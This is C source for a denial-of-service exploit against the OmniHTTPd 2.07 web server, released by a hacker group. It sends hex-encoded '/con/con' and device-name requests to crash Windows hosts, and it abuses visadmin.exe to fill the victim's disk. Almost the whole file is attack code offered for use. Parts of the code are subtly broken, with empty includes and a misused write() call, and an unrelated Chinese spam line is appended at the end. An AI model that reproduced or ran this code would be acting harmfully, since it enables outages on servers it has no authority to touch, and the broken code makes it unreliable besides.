/* tested on omnihttpd 2.07 /* this combines a shell script from sirius from buffer0vefl0w security /* and a bugtraq report from Valentin Perelogin /* except with actual code and combination of the two. /* kilrid@berZerker.net /* www.Hack-X.org */ #include #include #include #include #include #include #define port 80 // change respectively char buf[1024]; char concon[] = "\x47\x45\x54\x20" "\x2f\x63\x6f\x6e\x2f\x63\x6f\x6e\x0a"; char visadmin[] = "\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x76\x69" "\x73\x61\x64\x6d\x69\x6e\x2e\x65\x78\x65\x3f" "\x75\x73\x65\x72\x3d\x67\x75\x65\x73\x74\x0a"; int sock; struct hostent *hp; struct sockaddr_in s; int main( int argc, char *argv[] ) { if(argc < 2) { printf("omnihttpdex - kilrid@berZerker.net\n"); printf("usage(s)\n"); printf("%s crash - crashes machine via /con/con\n",argv[0]); printf("%s -d -crashes remote device ex: -d com1\n",argv[0]); printf("%s -attempt to exploit visadmin.exe\n",argv[0]); exit( -1 ); } hp=gethostbyname(argv[1]); if (!hp) { perror("Failed to resolve host"); exit( -1 ); } else { bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length); s.sin_family=hp->h_addrtype; s.sin_port=htons(port); if ((sock=socket(AF_INET,SOCK_STREAM,0))<0) perror("can't startup socket"); if (connect(sock,(struct sockaddr *)&s,sizeof(s))) perror("problem:"); usleep(100); if(!strcmp(argv[2], "crash")) { write(sock, concon,strlen(concon),0); printf("attempting to crash %s via /con/con\n",argv[1]); printf("string sent.\n"); } else if(!strcmp(argv[2], "-d")) { write(sock, "GET /%s\n",argv[3],0); printf("attempting to kill %s on victim %s...\n",argv[3],argv[1]); printf("string sent.\n"); } else if(!strcmp(argv[2], "visadmin")) { // this is only from versions prior to 2.07 I believe... write(sock, visadmin,strlen(visadmin),0); printf("requesting visadmin as guest to fill up victim's diskspace\n"); recv(sock, buf, sizeof(buf),0); if(!(!strcmp(buf, " "))) { printf("no visadmin.exe here...\n"); exit(-1); } else { printf("filling..\n"); usleep(10000); } } close(sock); } }

亚洲欧美在线